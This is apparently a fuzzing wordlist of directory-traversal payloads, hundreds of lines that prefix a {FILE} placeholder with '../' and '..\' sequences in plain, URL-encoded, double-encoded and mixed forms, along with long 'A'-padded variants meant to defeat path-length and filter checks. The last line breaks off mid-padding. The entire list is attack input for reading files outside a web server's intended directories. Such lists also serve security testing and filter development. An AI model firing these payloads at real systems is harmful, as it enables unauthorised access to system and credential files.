/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
/%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
/../{FILE}
/../../{FILE}
/../../../{FILE}
/../../../../{FILE}
/../../../../../{FILE}
/../../../../../../{FILE}
/../../../../../../../{FILE}
/../../../../../../../../{FILE}
/..%2f{FILE}
/..%2f..%2f{FILE}
/..%2f..%2f..%2f{FILE}
/..%2f..%2f..%2f..%2f{FILE}
/..%2f..%2f..%2f..%2f..%2f{FILE}
/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
/%2e%2e/{FILE}
/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/..%252f{FILE}
/..%252f..%252f{FILE}
/..%252f..%252f..%252f{FILE}
/..%252f..%252f..%252f..%252f{FILE}
/..%252f..%252f..%252f..%252f..%252f{FILE}
/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
/%252e%252e/{FILE}
/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/..\{FILE}
/..\..\{FILE}
/..\..\..\{FILE}
/..\..\..\..\{FILE}
/..\..\..\..\..\{FILE}
/..\..\..\..\..\..\{FILE}
/..\..\..\..\..\..\..\{FILE}
/..\..\..\..\..\..\..\..\{FILE}
/..%5c{FILE}
/..%5c..%5c{FILE}
/..%5c..%5c..%5c{FILE}
/..%5c..%5c..%5c..%5c{FILE}
/..%5c..%5c..%5c..%5c..%5c{FILE}
/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
/%2e%2e\{FILE}
/%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/..%255c{FILE}
/..%255c..%255c{FILE}
/..%255c..%255c..%255c{FILE}
/..%255c..%255c..%255c..%255c{FILE}
/..%255c..%255c..%255c..%255c..%255c{FILE}
/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
/%252e%252e\{FILE}
/%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/../{FILE}
/../../{FILE}
/../../../{FILE}
/../../../../{FILE}
/../../../../../{FILE}
/../../../../../../{FILE}
/../../../../../../../{FILE}
/../../../../../../../../{FILE}
/..%2f{FILE}
/..%2f..%2f{FILE}
/..%2f..%2f..%2f{FILE}
/..%2f..%2f..%2f..%2f{FILE}
/..%2f..%2f..%2f..%2f..%2f{FILE}
/..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
/%2e%2e/{FILE}
/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
/%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
/..%252f{FILE}
/..%252f..%252f{FILE}
/..%252f..%252f..%252f{FILE}
/..%252f..%252f..%252f..%252f{FILE}
/..%252f..%252f..%252f..%252f..%252f{FILE}
/..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
/%252e%252e/{FILE}
/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
/%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
/..\{FILE}
/..\..\{FILE}
/..\..\..\{FILE}
/..\..\..\..\{FILE}
/..\..\..\..\..\{FILE}
/..\..\..\..\..\..\{FILE}
/..\..\..\..\..\..\..\{FILE}
/..\..\..\..\..\..\..\..\{FILE}
/..%5c{FILE}
/..%5c..%5c{FILE}
/..%5c..%5c..%5c{FILE}
/..%5c..%5c..%5c..%5c{FILE}
/..%5c..%5c..%5c..%5c..%5c{FILE}
/..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
/%2e%2e\{FILE}
/%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
/%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
/..%255c{FILE}
/..%255c..%255c{FILE}
/..%255c..%255c..%255c{FILE}
/..%255c..%255c..%255c..%255c{FILE}
/..%255c..%255c..%255c..%255c..%255c{FILE}
/..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
/%252e%252e\{FILE}
/%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
/%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
/\../{FILE}
/\../\../{FILE}
/\../\../\../{FILE}
/\../\../\../\../{FILE}
/\../\../\../\../\../{FILE}
/\../\../\../\../\../\../{FILE}
/\../\../\../\../\../\../\../{FILE}
/\../\../\../\../\../\../\../\../{FILE}
//..\{FILE}
//..\/..\{FILE}
//..\/..\/..\{FILE}
//..\/..\/..\/..\{FILE}
//..\/..\/..\/..\/..\{FILE}
//..\/..\/..\/..\/..\/..\{FILE}
//..\/..\/..\/..\/..\/..\/..\{FILE}
//..\/..\/..\/..\/..\/..\/..\/..\{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA